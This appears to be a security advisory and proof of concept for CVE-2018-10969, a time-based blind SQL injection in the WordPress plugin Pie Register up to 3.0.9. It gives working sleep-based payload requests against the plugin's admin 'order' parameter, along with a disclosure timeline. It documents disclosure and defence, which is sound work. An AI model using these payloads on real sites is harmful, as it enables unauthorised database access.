48 lines
No EOL
1.7 KiB
Text
48 lines
No EOL
1.7 KiB
Text
# Title: WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection
|
|
# Author: Manuel García Cárdenas
|
|
# Date: 2018-05-10
|
|
# Software: WordPress Plugin Pie Register 3.0.9
|
|
# CVE: CVE-2018-10969
|
|
|
|
# I. VULNERABILITY
|
|
# WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection
|
|
|
|
# II. BACKGROUND
|
|
# Pie-Register is a quick and easy way to brand your Registration Pages on
|
|
# WordPress sites.
|
|
|
|
# III. DESCRIPTION
|
|
# This bug was found using the portal in the files:
|
|
# /pie-register/classes/invitation_code_pagination.php: if ( isset(
|
|
# $_GET['order'] ) && $_GET['order'] )
|
|
# /pie-register/classes/invitation_code_pagination.php: $order =
|
|
# $_GET['order'];
|
|
# And when the query is executed, the parameter "order" it is not sanitized.
|
|
# /pie-register/classes/invitation_code_pagination.php: $this->order = esc_sql( $order );
|
|
|
|
# IV. PROOF OF CONCEPT
|
|
# The following URL have been confirmed to all suffer from Time Based SQL Injection.
|
|
|
|
GET
|
|
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc
|
|
(original)
|
|
|
|
GET
|
|
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(2)))a)
|
|
HTTP/1.1(2 seconds of response)
|
|
|
|
GET
|
|
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a)
|
|
HTTP/1.1(30 seconds of response)
|
|
|
|
# V. SYSTEMS AFFECTED
|
|
# Pie Register <= 3.0.9
|
|
|
|
# VI. DISCLOSURE TIMELINE
|
|
# May 10, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
|
|
# May 10, 2018 2: Send to vendor without response
|
|
# June 05, 2018 3: Second email to vendor without response
|
|
# June 11, 2018 4: Send to the Full-Disclosure lists
|
|
|
|
# VII. Solution
|
|
# Disable plugin until a fix is available |